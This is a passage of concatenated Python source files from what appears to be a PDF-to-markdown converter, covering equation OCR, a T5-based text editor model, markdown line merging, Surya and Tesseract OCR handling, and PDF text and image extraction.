page_blocks.blocks = new_blocks return success_count, fail_count, converted_spans def replace_equations(doc, pages: List[Page], texify_model, batch_multiplier=1): unsuccessful_ocr = 0 successful_ocr = 0 # Find potential equation regions, and length of text in each region equation_blocks = [] for pnum, page in enumerate(pages): equation_blocks.append(find_equation_blocks(page, texify_model.processor)) eq_count = sum([len(x) for x in equation_blocks]) images = [] token_counts = [] for page_idx, page_equation_blocks in enumerate(equation_blocks): page_obj = doc[page_idx] for equation_idx, (insert_block_idx, insert_line_idx, token_count, block_text, equation_bbox) in enumerate(page_equation_blocks): png_image = render_bbox_image(page_obj, pages[page_idx], equation_bbox) images.append(png_image) token_counts.append(token_count) # Make batched predictions predictions = get_latex_batched(images, token_counts, texify_model, batch_multiplier=batch_multiplier) # Replace blocks with predictions page_start = 0 converted_spans = [] for page_idx, page_equation_blocks in enumerate(equation_blocks): page_equation_count = len(page_equation_blocks) 
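        # (Editor's note, added) Predictions were generated in one batched call across
        # all pages, so slice out this page's share starting at the running page_start
        # offset; page_start is advanced by page_equation_count at the end of each
        # iteration.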
page_predictions = predictions[page_start:page_start + page_equation_count] success_count, fail_count, converted_span = insert_latex_block( pages[page_idx], page_equation_blocks, page_predictions, page_idx, texify_model.processor ) converted_spans.extend(converted_span) page_start += page_equation_count successful_ocr += success_count unsuccessful_ocr += fail_count # If debug mode is on, dump out conversions for comparison dump_equation_debug_data(doc, images, converted_spans) return pages, {"successful_ocr": successful_ocr, "unsuccessful_ocr": unsuccessful_ocr, "equations": eq_count} File: marker/postprocessors/t5.py from transformers import T5Config, T5PreTrainedModel import torch from torch import nn from copy import deepcopy from typing import Optional, Tuple, Union from itertools import chain from transformers.modeling_outputs import TokenClassifierOutput from transformers.models.t5.modeling_t5 import T5Stack from transformers.utils.model_parallel_utils import get_device_map, assert_device_map def byt5_tokenize(text: str, max_length: int, pad_token_id: int = 0): byte_codes = [] for char in text: # Add 3 to account for special tokens byte_codes.append([byte + 3 for byte in char.encode('utf-8')]) tokens = list(chain.from_iterable(byte_codes)) # Map each token to the character it represents char_token_lengths = [len(b) for b in byte_codes] batched_tokens = [] attention_mask = [] for i in range(0, len(tokens), max_length): batched_tokens.append(tokens[i:i + max_length]) attention_mask.append([1] * len(batched_tokens[-1])) # Pad last item if len(batched_tokens[-1]) < max_length: batched_tokens[-1] += [pad_token_id] * (max_length - len(batched_tokens[-1])) attention_mask[-1] += [0] * (max_length - len(attention_mask[-1])) return {"input_ids": batched_tokens, "attention_mask": attention_mask, "char_token_lengths": char_token_lengths} # From https://github.com/osainz59/t5-encoder class T5ForTokenClassification(T5PreTrainedModel): _keys_to_ignore_on_load_missing = [r"encoder.embed_tokens.weight"] def __init__(self, config: T5Config): super().__init__(config) self.model_dim = config.d_model self.shared = nn.Embedding(config.vocab_size, config.d_model) encoder_config = deepcopy(config) encoder_config.is_decoder = False encoder_config.is_encoder_decoder = False encoder_config.use_cache = False self.encoder = T5Stack(encoder_config, self.shared) classifier_dropout = ( config.classifier_dropout if hasattr(config, 'classifier_dropout') else config.dropout_rate ) self.dropout = nn.Dropout(classifier_dropout) self.classifier = nn.Linear(config.d_model, config.num_labels) # Initialize weights and apply final processing self.post_init() # Model parallel self.model_parallel = False self.device_map = None def parallelize(self, device_map=None): self.device_map = ( get_device_map(len(self.encoder.block), range(torch.cuda.device_count())) if device_map is None else device_map ) assert_device_map(self.device_map, len(self.encoder.block)) self.encoder.parallelize(self.device_map) self.classifier.to(self.encoder.first_device) self.model_parallel = True def deparallelize(self): self.encoder.deparallelize() self.encoder = self.encoder.to("cpu") self.classifier = self.classifier.to("cpu") self.model_parallel = False self.device_map = None torch.cuda.empty_cache() def get_input_embeddings(self): return self.shared def set_input_embeddings(self, new_embeddings): self.shared = new_embeddings self.encoder.set_input_embeddings(new_embeddings) def get_encoder(self): return self.encoder def _prune_heads(self, 
heads_to_prune): for layer, heads in heads_to_prune.items(): self.encoder.block[layer].layer[0].SelfAttention.prune_heads(heads) def forward( self, input_ids: Optional[torch.LongTensor] = None, attention_mask: Optional[torch.FloatTensor] = None, head_mask: Optional[torch.FloatTensor] = None, inputs_embeds: Optional[torch.FloatTensor] = None, labels: Optional[torch.LongTensor] = None, output_attentions: Optional[bool] = None, output_hidden_states: Optional[bool] = None, return_dict: Optional[bool] = None, ) -> Union[Tuple[torch.FloatTensor], TokenClassifierOutput]: return_dict = return_dict if return_dict is not None else self.config.use_return_dict outputs = self.encoder( input_ids=input_ids, attention_mask=attention_mask, inputs_embeds=inputs_embeds, head_mask=head_mask, output_attentions=output_attentions, output_hidden_states=output_hidden_states, return_dict=return_dict, ) sequence_output = outputs[0] sequence_output = self.dropout(sequence_output) logits = self.classifier(sequence_output) loss = None if not return_dict: output = (logits,) + outputs[2:] return ((loss,) + output) if loss is not None else output return TokenClassifierOutput( loss=loss, logits=logits, hidden_states=outputs.hidden_states, attentions=outputs.attentions ) File: marker/postprocessors/markdown.py from marker.schema.merged import MergedLine, MergedBlock, FullyMergedBlock from marker.schema.page import Page import re import regex from typing import List from marker.settings import settings def escape_markdown(text): # List of characters that need to be escaped in markdown characters_to_escape = r"[#]" # Escape each of these characters with a backslash escaped_text = re.sub(characters_to_escape, r'\\\g<0>', text) return escaped_text def surround_text(s, char_to_insert): leading_whitespace = re.match(r'^(\s*)', s).group(1) trailing_whitespace = re.search(r'(\s*)$', s).group(1) stripped_string = s.strip() modified_string = char_to_insert + stripped_string + char_to_insert final_string = leading_whitespace + modified_string + trailing_whitespace return final_string def merge_spans(pages: List[Page]) -> List[List[MergedBlock]]: merged_blocks = [] for page in pages: page_blocks = [] for blocknum, block in enumerate(page.blocks): block_lines = [] for linenum, line in enumerate(block.lines): line_text = "" if len(line.spans) == 0: continue fonts = [] for i, span in enumerate(line.spans): font = span.font.lower() next_span = None next_idx = 1 while len(line.spans) > i + next_idx: next_span = line.spans[i + next_idx] next_idx += 1 if len(next_span.text.strip()) > 2: break fonts.append(font) span_text = span.text # Don't bold or italicize very short sequences # Avoid bolding first and last sequence so lines can be joined properly if len(span_text) > 3 and 0 < i < len(line.spans) - 1: if span.italic and (not next_span or not next_span.italic): span_text = surround_text(span_text, "*") elif span.bold and (not next_span or not next_span.bold): span_text = surround_text(span_text, "**") line_text += span_text block_lines.append(MergedLine( text=line_text, fonts=fonts, bbox=line.bbox )) if len(block_lines) > 0: page_blocks.append(MergedBlock( lines=block_lines, pnum=block.pnum, bbox=block.bbox, block_type=block.block_type )) merged_blocks.append(page_blocks) return merged_blocks def block_surround(text, block_type): if block_type == "Section-header": if not text.startswith("#"): text = "\n## " + text.strip().title() + "\n" elif block_type == "Title": if not text.startswith("#"): text = "# " + text.strip().title() + "\n" elif 
block_type == "Table": text = "\n" + text + "\n" elif block_type == "List-item": text = escape_markdown(text) elif block_type == "Code": text = "\n```\n" + text + "\n```\n" elif block_type == "Text": text = escape_markdown(text) elif block_type == "Formula": if text.strip().startswith("$$") and text.strip().endswith("$$"): text = text.strip() text = "\n" + text + "\n" return text def line_separator(line1, line2, block_type, is_continuation=False): # Should cover latin-derived languages and russian lowercase_letters = r'\p{Lo}|\p{Ll}|\d' hyphens = r'-—¬' # Remove hyphen in current line if next line and current line appear to be joined hyphen_pattern = regex.compile(rf'.*[{lowercase_letters}][{hyphens}]\s?$', regex.DOTALL) if line1 and hyphen_pattern.match(line1) and regex.match(rf"^\s?[{lowercase_letters}]", line2): # Split on — or - from the right line1 = regex.split(rf"[{hyphens}]\s?$", line1)[0] return line1.rstrip() + line2.lstrip() all_letters = r'\p{L}|\d' sentence_continuations = r',;\(\—\"\'\*' sentence_ends = r'。ๆ\.?!' line_end_pattern = regex.compile(rf'.*[{lowercase_letters}][{sentence_continuations}]?\s?$', regex.DOTALL) line_start_pattern = regex.compile(rf'^\s?[{all_letters}]', regex.DOTALL) sentence_end_pattern = regex.compile(rf'.*[{sentence_ends}]\s?$', regex.DOTALL) text_blocks = ["Text", "List-item", "Footnote", "Caption", "Figure"] if block_type in ["Title", "Section-header"]: return line1.rstrip() + " " + line2.lstrip() elif block_type == "Formula": return line1 + "\n" + line2 elif line_end_pattern.match(line1) and line_start_pattern.match(line2) and block_type in text_blocks: return line1.rstrip() + " " + line2.lstrip() elif is_continuation: return line1.rstrip() + " " + line2.lstrip() elif block_type in text_blocks and sentence_end_pattern.match(line1): return line1 + "\n\n" + line2 elif block_type == "Table": return line1 + "\n\n" + line2 else: return line1 + "\n" + line2 def block_separator(line1, line2, block_type1, block_type2): sep = "\n" if block_type1 == "Text": sep = "\n\n" return sep + line2 def merge_lines(blocks: List[List[MergedBlock]]): text_blocks = [] prev_type = None prev_line = None block_text = "" block_type = "" for idx, page in enumerate(blocks): for block in page: block_type = block.block_type if block_type != prev_type and prev_type: text_blocks.append( FullyMergedBlock( text=block_surround(block_text, prev_type), block_type=prev_type ) ) block_text = "" prev_type = block_type # Join lines in the block together properly for i, line in enumerate(block.lines): line_height = line.bbox[3] - line.bbox[1] prev_line_height = prev_line.bbox[3] - prev_line.bbox[1] if prev_line else 0 prev_line_x = prev_line.bbox[0] if prev_line else 0 prev_line = line is_continuation = line_height == prev_line_height and line.bbox[0] == prev_line_x if block_text: block_text = line_separator(block_text, line.text, block_type, is_continuation) else: block_text = line.text if settings.PAGINATE_OUTPUT and idx < len(blocks) - 1: block_text += "\n\n" + "-" * 16 + "\n\n" # Page separator horizontal rule # Append the final block text_blocks.append( FullyMergedBlock( text=block_surround(block_text, prev_type), block_type=block_type ) ) return text_blocks def get_full_text(text_blocks): full_text = "" prev_block = None for block in text_blocks: if prev_block: full_text += block_separator(prev_block.text, block.text, prev_block.block_type, block.block_type) else: full_text += block.text prev_block = block return full_text File: marker/postprocessors/editor.py from collections import 
defaultdict from itertools import chain from typing import Optional from marker.settings import settings import torch import torch.nn.functional as F from marker.postprocessors.t5 import T5ForTokenClassification, byt5_tokenize def get_batch_size(): if settings.EDITOR_BATCH_SIZE is not None: return settings.EDITOR_BATCH_SIZE elif settings.TORCH_DEVICE_MODEL == "cuda": return 12 return 6 def load_editing_model(device=None, dtype=None): if not settings.ENABLE_EDITOR_MODEL: return None if device: model = T5ForTokenClassification.from_pretrained( settings.EDITOR_MODEL_NAME, torch_dtype=dtype, device=device, ) else: model = T5ForTokenClassification.from_pretrained( settings.EDITOR_MODEL_NAME, torch_dtype=settings.MODEL_DTYPE, ).to(settings.TORCH_DEVICE_MODEL) model.eval() model.config.label2id = { "equal": 0, "delete": 1, "newline-1": 2, "space-1": 3, } model.config.id2label = {v: k for k, v in model.config.label2id.items()} return model def edit_full_text(text: str, model: Optional[T5ForTokenClassification], batch_multiplier=1) -> (str, dict): if not model: return text, {} batch_size = get_batch_size() * batch_multiplier tokenized = byt5_tokenize(text, settings.EDITOR_MAX_LENGTH) input_ids = tokenized["input_ids"] char_token_lengths = tokenized["char_token_lengths"] # Run model token_masks = [] for i in range(0, len(input_ids), batch_size): batch_input_ids = tokenized["input_ids"][i: i + batch_size] batch_input_ids = torch.tensor(batch_input_ids, device=model.device) batch_attention_mask = tokenized["attention_mask"][i: i + batch_size] batch_attention_mask = torch.tensor(batch_attention_mask, device=model.device) with torch.inference_mode(): predictions = model(batch_input_ids, attention_mask=batch_attention_mask) logits = predictions.logits.cpu() # If the max probability is less than a threshold, we assume it's a bad prediction # We want to be conservative to not edit the text too much probs = F.softmax(logits, dim=-1) max_prob = torch.max(probs, dim=-1) cutoff_prob = max_prob.values < settings.EDITOR_CUTOFF_THRESH labels = logits.argmax(-1) labels[cutoff_prob] = model.config.label2id["equal"] labels = labels.squeeze().tolist() if len(labels) == settings.EDITOR_MAX_LENGTH: labels = [labels] labels = list(chain.from_iterable(labels)) token_masks.extend(labels) # List of characters in the text flat_input_ids = list(chain.from_iterable(input_ids)) # Strip special tokens 0,1. 
Keep unknown token, although it should never be used assert len(token_masks) == len(flat_input_ids) token_masks = [mask for mask, token in zip(token_masks, flat_input_ids) if token >= 2] assert len(token_masks) == len(list(text.encode("utf-8"))) edit_stats = defaultdict(int) out_text = [] start = 0 for i, char in enumerate(text): char_token_length = char_token_lengths[i] masks = token_masks[start: start + char_token_length] labels = [model.config.id2label[mask] for mask in masks] if all(l == "delete" for l in labels): # If we delete whitespace, roll with it, otherwise ignore if char.strip(): out_text.append(char) else: edit_stats["delete"] += 1 elif labels[0] == "newline-1": out_text.append("\n") out_text.append(char) edit_stats["newline-1"] += 1 elif labels[0] == "space-1": out_text.append(" ") out_text.append(char) edit_stats["space-1"] += 1 else: out_text.append(char) edit_stats["equal"] += 1 start += char_token_length out_text = "".join(out_text) return out_text, edit_stats File: marker/ocr/recognition.py import tempfile from itertools import repeat from typing import List, Optional, Dict import pypdfium2 as pdfium import io from concurrent.futures import ThreadPoolExecutor from surya.ocr import run_recognition from marker.models import setup_recognition_model from marker.ocr.heuristics import should_ocr_page, no_text_found, detect_bad_ocr from marker.ocr.lang import langs_to_ids from marker.pdf.images import render_image from marker.schema.page import Page from marker.schema.block import Block, Line, Span from marker.settings import settings from marker.pdf.extract_text import get_text_blocks def get_batch_size(): if settings.RECOGNITION_BATCH_SIZE is not None: return settings.RECOGNITION_BATCH_SIZE elif settings.TORCH_DEVICE_MODEL == "cuda": return 32 elif settings.TORCH_DEVICE_MODEL == "mps": return 32 return 32 def run_ocr(doc, pages: List[Page], langs: List[str], rec_model, batch_multiplier=1, ocr_all_pages=False) -> (List[Page], Dict): ocr_pages = 0 ocr_success = 0 ocr_failed = 0 no_text = no_text_found(pages) ocr_idxs = [] for pnum, page in enumerate(pages): ocr_needed = should_ocr_page(page, no_text, ocr_all_pages=ocr_all_pages) if ocr_needed: ocr_idxs.append(pnum) ocr_pages += 1 # No pages need OCR if ocr_pages == 0: return pages, {"ocr_pages": 0, "ocr_failed": 0, "ocr_success": 0, "ocr_engine": "none"} ocr_method = settings.OCR_ENGINE if ocr_method is None or ocr_method == "None": return pages, {"ocr_pages": 0, "ocr_failed": 0, "ocr_success": 0, "ocr_engine": "none"} elif ocr_method == "surya": new_pages = surya_recognition(doc, ocr_idxs, langs, rec_model, pages, batch_multiplier=batch_multiplier) elif ocr_method == "ocrmypdf": new_pages = tesseract_recognition(doc, ocr_idxs, langs) else: raise ValueError(f"Unknown OCR method {ocr_method}") for orig_idx, page in zip(ocr_idxs, new_pages): if detect_bad_ocr(page.prelim_text) or len(page.prelim_text) == 0: ocr_failed += 1 else: ocr_success += 1 pages[orig_idx] = page return pages, {"ocr_pages": ocr_pages, "ocr_failed": ocr_failed, "ocr_success": ocr_success, "ocr_engine": ocr_method} def surya_recognition(doc, page_idxs, langs: List[str], rec_model, pages: List[Page], batch_multiplier=1) -> List[Optional[Page]]: images = [render_image(doc[pnum], dpi=settings.SURYA_OCR_DPI) for pnum in page_idxs] processor = rec_model.processor selected_pages = [p for i, p in enumerate(pages) if i in page_idxs] surya_langs = [langs] * len(page_idxs) detection_results = [p.text_lines.bboxes for p in selected_pages] polygons = [[b.polygon for b in 
bboxes] for bboxes in detection_results] results = run_recognition(images, surya_langs, rec_model, processor, polygons=polygons, batch_size=int(get_batch_size() * batch_multiplier)) new_pages = [] for (page_idx, result, old_page) in zip(page_idxs, results, selected_pages): text_lines = old_page.text_lines ocr_results = result.text_lines blocks = [] for i, line in enumerate(ocr_results): block = Block( bbox=line.bbox, pnum=page_idx, lines=[Line( bbox=line.bbox, spans=[Span( text=line.text, bbox=line.bbox, span_id=f"{page_idx}_{i}", font="", font_weight=0, font_size=0, ) ] )] ) blocks.append(block) page = Page( blocks=blocks, pnum=page_idx, bbox=result.image_bbox, rotation=0, text_lines=text_lines, ocr_method="surya" ) new_pages.append(page) return new_pages def tesseract_recognition(doc, page_idxs, langs: List[str]) -> List[Optional[Page]]: pdf_pages = generate_single_page_pdfs(doc, page_idxs) with ThreadPoolExecutor(max_workers=settings.OCR_PARALLEL_WORKERS) as executor: pages = list(executor.map(_tesseract_recognition, pdf_pages, repeat(langs, len(pdf_pages)))) return pages def generate_single_page_pdfs(doc, page_idxs) -> List[io.BytesIO]: pdf_pages = [] for page_idx in page_idxs: blank_doc = pdfium.PdfDocument.new() blank_doc.import_pages(doc, pages=[page_idx]) assert len(blank_doc) == 1, "Failed to import page" in_pdf = io.BytesIO() blank_doc.save(in_pdf) in_pdf.seek(0) pdf_pages.append(in_pdf) return pdf_pages def _tesseract_recognition(in_pdf, langs: List[str]) -> Optional[Page]: import ocrmypdf out_pdf = io.BytesIO() ocrmypdf.ocr( in_pdf, out_pdf, language=langs[0], output_type="pdf", redo_ocr=None, force_ocr=True, progress_bar=False, optimize=False, fast_web_view=1e6, skip_big=15, # skip images larger than 15 megapixels tesseract_timeout=settings.TESSERACT_TIMEOUT, tesseract_non_ocr_timeout=settings.TESSERACT_TIMEOUT, ) with tempfile.NamedTemporaryFile() as f: f.write(out_pdf.getvalue()) f.seek(0) new_doc = pdfium.PdfDocument(f.name) blocks, _ = get_text_blocks(new_doc, f.name, max_pages=1) page = blocks[0] page.ocr_method = "tesseract" return page File: marker/ocr/lang.py from typing import List from surya.languages import CODE_TO_LANGUAGE, LANGUAGE_TO_CODE from surya.model.recognition.tokenizer import _tokenize as lang_tokenize from marker.ocr.tesseract import LANGUAGE_TO_TESSERACT_CODE, TESSERACT_CODE_TO_LANGUAGE from marker.settings import settings def langs_to_ids(langs: List[str]): unique_langs = list(set(langs)) _, lang_tokens = lang_tokenize("", unique_langs) return lang_tokens def replace_langs_with_codes(langs): if settings.OCR_ENGINE == "surya": if langs is None: return for i, lang in enumerate(langs): if lang.title() in LANGUAGE_TO_CODE: langs[i] = LANGUAGE_TO_CODE[lang.title()] else: if langs is None: langs = [settings.DEFAULT_LANG] print(f"No languages specified for tesseract, defaulting to {settings.DEFAULT_LANG}.") for i, lang in enumerate(langs): if lang in LANGUAGE_TO_CODE: langs[i] = LANGUAGE_TO_TESSERACT_CODE[lang] return langs def validate_langs(langs): if settings.OCR_ENGINE == "surya": if langs is None: return for lang in langs: if lang not in CODE_TO_LANGUAGE: raise ValueError(f"Invalid language code {lang} for Surya OCR") else: for lang in langs: if lang not in TESSERACT_CODE_TO_LANGUAGE: raise ValueError(f"Invalid language code {lang} for Tesseract") File: marker/ocr/tesseract.py LANGUAGE_TO_TESSERACT_CODE = { 'Afrikaans': 'afr', 'Amharic': 'amh', 'Arabic': 'ara', 'Assamese': 'asm', 'Azerbaijani': 'aze', 'Belarusian': 'bel', 'Bulgarian': 'bul', 'Bengali': 
'ben', 'Breton': 'bre', 'Bosnian': 'bos', 'Catalan': 'cat', 'Czech': 'ces', 'Welsh': 'cym', 'Danish': 'dan', 'German': 'deu', 'Greek': 'ell', 'English': 'eng', 'Esperanto': 'epo', 'Spanish': 'spa', 'Estonian': 'est', 'Basque': 'eus', 'Persian': 'fas', 'Finnish': 'fin', 'French': 'fra', 'Western Frisian': 'fry', 'Irish': 'gle', 'Scottish Gaelic': 'gla', 'Galician': 'glg', 'Gujarati': 'guj', 'Hausa': 'hau', 'Hebrew': 'heb', 'Hindi': 'hin', 'Croatian': 'hrv', 'Hungarian': 'hun', 'Armenian': 'hye', 'Indonesian': 'ind', 'Icelandic': 'isl', 'Italian': 'ita', 'Japanese': 'jpn', 'Javanese': 'jav', 'Georgian': 'kat', 'Kazakh': 'kaz', 'Khmer': 'khm', 'Kannada': 'kan', 'Korean': 'kor', 'Kurdish': 'kur', 'Kyrgyz': 'kir', 'Latin': 'lat', 'Lao': 'lao', 'Lithuanian': 'lit', 'Latvian': 'lav', 'Malagasy': 'mlg', 'Macedonian': 'mkd', 'Malayalam': 'mal', 'Mongolian': 'mon', 'Marathi': 'mar', 'Malay': 'msa', 'Burmese': 'mya', 'Nepali': 'nep', 'Dutch': 'nld', 'Norwegian': 'nor', 'Oromo': 'orm', 'Oriya': 'ori', 'Punjabi': 'pan', 'Polish': 'pol', 'Pashto': 'pus', 'Portuguese': 'por', 'Romanian': 'ron', 'Russian': 'rus', 'Sanskrit': 'san', 'Sindhi': 'snd', 'Sinhala': 'sin', 'Slovak': 'slk', 'Slovenian': 'slv', 'Somali': 'som', 'Albanian': 'sqi', 'Serbian': 'srp', 'Sundanese': 'sun', 'Swedish': 'swe', 'Swahili': 'swa', 'Tamil': 'tam', 'Telugu': 'tel', 'Thai': 'tha', 'Tagalog': 'tgl', 'Turkish': 'tur', 'Uyghur': 'uig', 'Ukrainian': 'ukr', 'Urdu': 'urd', 'Uzbek': 'uzb', 'Vietnamese': 'vie', 'Xhosa': 'xho', 'Yiddish': 'yid', 'Chinese': 'chi_sim', } TESSERACT_CODE_TO_LANGUAGE = {v:k for k,v in LANGUAGE_TO_TESSERACT_CODE.items()} File: marker/ocr/detection.py from typing import List from pypdfium2 import PdfDocument from surya.detection import batch_text_detection from marker.pdf.images import render_image from marker.schema.page import Page from marker.settings import settings def get_batch_size(): if settings.DETECTOR_BATCH_SIZE is not None: return settings.DETECTOR_BATCH_SIZE elif settings.TORCH_DEVICE_MODEL == "cuda": return 4 return 4 def surya_detection(doc: PdfDocument, pages: List[Page], det_model, batch_multiplier=1): processor = det_model.processor max_len = min(len(pages), len(doc)) images = [render_image(doc[pnum], dpi=settings.SURYA_DETECTOR_DPI) for pnum in range(max_len)] predictions = batch_text_detection(images, det_model, processor, batch_size=int(get_batch_size() * batch_multiplier)) for (page, pred) in zip(pages, predictions): page.text_lines = pred File: marker/ocr/heuristics.py import re from typing import List from marker.ocr.utils import alphanum_ratio from marker.schema.bbox import rescale_bbox, box_intersection_pct from marker.schema.page import Page from marker.settings import settings def should_ocr_page(page: Page, no_text: bool, ocr_all_pages=False): detected_lines_found, total_lines = detected_line_coverage(page) # No reason to OCR page if it has no text lines if total_lines == 0: return False # OCR page if we got minimal text, or if we got too many spaces conditions = [ no_text, # Full doc has no text, and needs full OCR (len(page.prelim_text) > 0 and detect_bad_ocr(page.prelim_text)), # Bad OCR detected_lines_found is False, # didn't extract text for all detected lines ] return any(conditions) or ocr_all_pages def detect_bad_ocr(text, space_threshold=.7, newline_threshold=.6, alphanum_threshold=.3): if len(text) == 0: # Assume OCR failed if we have no text return True spaces = len(re.findall(r'\s+', text)) alpha_chars = len(re.sub(r'\s+', '', text)) if spaces / (alpha_chars + spaces) > 
space_threshold: return True newlines = len(re.findall(r'\n+', text)) non_newlines = len(re.sub(r'\n+', '', text)) if newlines / (newlines + non_newlines) > newline_threshold: return True if alphanum_ratio(text) < alphanum_threshold: # Garbled text return True invalid_chars = len([c for c in text if c in settings.INVALID_CHARS]) if invalid_chars > max(6.0, len(text) * .03): return True return False def no_text_found(pages: List[Page]): full_text = "" for page in pages: full_text += page.prelim_text return len(full_text.strip()) == 0 def detected_line_coverage(page: Page, intersect_thresh=.5, detection_thresh=.4): found_lines = 0 for detected_line in page.text_lines.bboxes: # Get bbox and rescale to match dimensions of original page detected_bbox = detected_line.bbox detected_bbox = rescale_bbox(page.text_lines.image_bbox, page.bbox, detected_bbox) total_intersection = 0 for block in page.blocks: for line in block.lines: intersection_pct = box_intersection_pct(detected_bbox, line.bbox) total_intersection += intersection_pct if total_intersection > intersect_thresh: found_lines += 1 total_lines = len(page.text_lines.bboxes) if total_lines == 0: return True, 0 return found_lines / total_lines > detection_thresh, total_lines File: marker/ocr/utils.py def alphanum_ratio(text): text = text.replace(" ", "") text = text.replace("\n", "") alphanumeric_count = sum([1 for c in text if c.isalnum()]) if len(text) == 0: return 1 ratio = alphanumeric_count / len(text) return ratio File: marker/pdf/extract_text.py import os from typing import List, Optional, Dict import pypdfium2 as pdfium import pypdfium2.internal as pdfium_i from marker.pdf.utils import font_flags_decomposer from marker.settings import settings from marker.schema.block import Span, Line, Block from marker.schema.page import Page from pdftext.extraction import dictionary_output os.environ["TESSDATA_PREFIX"] = settings.TESSDATA_PREFIX def pdftext_format_to_blocks(page, pnum: int) -> Page: page_blocks = [] span_id = 0 for block_idx, block in enumerate(page["blocks"]): block_lines = [] for l in block["lines"]: spans = [] for i, s in enumerate(l["spans"]): block_text = s["text"] # Remove trailing newlines and carriage returns (tesseract) while len(block_text) > 0 and block_text[-1] in ["\n", "\r"]: block_text = block_text[:-1] block_text = block_text.replace("-\n", "") # Remove hyphenated line breaks span_obj = Span( text=block_text, # Remove end of line newlines, not spaces bbox=s["bbox"], span_id=f"{pnum}_{span_id}", font=f"{s['font']['name']}_{font_flags_decomposer(s['font']['flags'])}", # Add font flags to end of font font_weight=s["font"]["weight"], font_size=s["font"]["size"], ) spans.append(span_obj) # Text, bounding box, span id span_id += 1 line_obj = Line( spans=spans, bbox=l["bbox"], ) # Only select valid lines, with positive bboxes if line_obj.area >= 0: block_lines.append(line_obj) block_obj = Block( lines=block_lines, bbox=block["bbox"], pnum=pnum ) # Only select blocks with lines if len(block_lines) > 0: page_blocks.append(block_obj) page_bbox = page["bbox"] page_width = abs(page_bbox[2] - page_bbox[0]) page_height = abs(page_bbox[3] - page_bbox[1]) rotation = page["rotation"] # Flip width and height if rotated if rotation == 90 or rotation == 270: page_width, page_height = page_height, page_width char_blocks = page["blocks"] page_bbox = [0, 0, page_width, page_height] out_page = Page( blocks=page_blocks, pnum=page["page"], bbox=page_bbox, rotation=rotation, char_blocks=char_blocks ) return out_page def get_text_blocks(doc, 
fname, max_pages: Optional[int] = None, start_page: Optional[int] = None) -> (List[Page], Dict): toc = get_toc(doc) if start_page: assert start_page < len(doc) else: start_page = 0 if max_pages: if max_pages + start_page > len(doc): max_pages = len(doc) - start_page else: max_pages = len(doc) - start_page page_range = range(start_page, start_page + max_pages) char_blocks = dictionary_output(fname, page_range=page_range, keep_chars=True, workers=settings.PDFTEXT_CPU_WORKERS) marker_blocks = [pdftext_format_to_blocks(page, pnum) for pnum, page in enumerate(char_blocks)] return marker_blocks, toc def naive_get_text(doc): full_text = "" for page_idx in range(len(doc)): page = doc.get_page(page_idx) text_page = page.get_textpage() full_text += text_page.get_text_bounded() + "\n" return full_text def get_toc(doc, max_depth=15): toc = doc.get_toc(max_depth=max_depth) toc_list = [] for item in toc: list_item = { "title": item.title, "level": item.level, "is_closed": item.is_closed, "n_kids": item.n_kids, "page_index": item.page_index, "view_mode": pdfium_i.ViewmodeToStr.get(item.view_mode), "view_pos": item.view_pos, } toc_list.append(list_item) return toc_list def get_length_of_text(fname: str) -> int: doc = pdfium.PdfDocument(fname) text = naive_get_text(doc).strip() return len(text) File: marker/pdf/utils.py from typing import Optional import filetype from marker.settings import settings def find_filetype(fpath): kind = filetype.guess(fpath) if kind is None: print(f"Could not determine filetype for {fpath}") return "other" mimetype = kind.mime # Get extensions from mimetype # The mimetype is not always consistent, so use in to check the most common formats if "pdf" in mimetype: return "pdf" elif mimetype in settings.SUPPORTED_FILETYPES: return settings.SUPPORTED_FILETYPES[mimetype] else: print(f"Found nonstandard filetype {mimetype}") return "other" def font_flags_decomposer(flags: Optional[int]) -> str: if flags is None: return "" flag_descriptions = [] if flags & (1 << 0): # PDFFONT_FIXEDPITCH flag_descriptions.append("fixed_pitch") if flags & (1 << 1): # PDFFONT_SERIF flag_descriptions.append("serif") if flags & (1 << 2): # PDFFONT_SYMBOLIC flag_descriptions.append("symbolic") if flags & (1 << 3): # PDFFONT_SCRIPT flag_descriptions.append("script") if flags & (1 << 5): # PDFFONT_NONSYMBOLIC flag_descriptions.append("non_symbolic") if flags & (1 << 6): # PDFFONT_ITALIC flag_descriptions.append("italic") if flags & (1 << 16): # PDFFONT_ALLCAP flag_descriptions.append("all_cap") if flags & (1 << 17): # PDFFONT_SMALLCAP flag_descriptions.append("small_cap") if flags & (1 << 18): # PDFFONT_FORCEBOLD flag_descriptions.append("bold") if flags & (1 << 19): # PDFFONT_USEEXTERNATTR flag_descriptions.append("use_extern_attr") return "_".join(flag_descriptions) def sort_block_group(blocks, tolerance=1.25): vertical_groups = {} for block in blocks: if hasattr(block, "bbox"): bbox = block.bbox else: bbox = block["bbox"] group_key = round(bbox[1] / tolerance) * tolerance if group_key not in vertical_groups: vertical_groups[group_key] = [] vertical_groups[group_key].append(block) # Sort each group horizontally and flatten the groups into a single list sorted_blocks = [] for _, group in sorted(vertical_groups.items()): sorted_group = sorted(group, key=lambda x: x.bbox[0] if hasattr(x, "bbox") else x["bbox"][0]) sorted_blocks.extend(sorted_group) return sorted_blocks File: marker/pdf/images.py import pypdfium2 as pdfium from pypdfium2 import PdfPage from marker.schema.page import Page from marker.schema.bbox 
import rescale_bbox from marker.settings import settings def render_image(page: pdfium.PdfPage, dpi): image = page.render( scale=dpi / 72, draw_annots=False ).to_pil() image = image.convert("RGB") return image def render_bbox_image(page_obj: PdfPage, page: Page, bbox): png_image = render_image(page_obj, settings.IMAGE_DPI) # Rescale original pdf bbox bounds to match png image size png_bbox = [0, 0, png_image.size[0], png_image.size[1]] rescaled_merged = rescale_bbox(page.bbox, png_bbox, bbox) # Crop out only the equation image png_image = png_image.crop(rescaled_merged) png_image = png_image.convert("RGB") return png_image File: marker/schema/page.py from collections import Counter from typing import List, Optional, Dict, Any from marker.schema.bbox import BboxElement from marker.schema.block import Block, Span from surya.schema import TextDetectionResult, LayoutResult, OrderResult class Page(BboxElement): blocks: List[Block] pnum: int rotation: Optional[int] = None # Rotation degrees of the page text_lines: Optional[TextDetectionResult] = None layout: Optional[LayoutResult] = None order: Optional[OrderResult] = None ocr_method: Optional[str] = None # One of "surya" or "tesseract" char_blocks: Optional[List[Dict]] = None # Blocks with character-level data from pdftext images: Optional[List[Any]] = None # Images to save along with the page, need Any to avoid pydantic error def get_nonblank_lines(self): lines = self.get_all_lines() nonblank_lines = [l for l in lines if l.prelim_text.strip()] return nonblank_lines def get_all_lines(self): lines = [l for b in self.blocks for l in b.lines] return lines def get_nonblank_spans(self) -> List[Span]: lines = [l for b in self.blocks for l in b.lines] spans = [s for l in lines for s in l.spans if 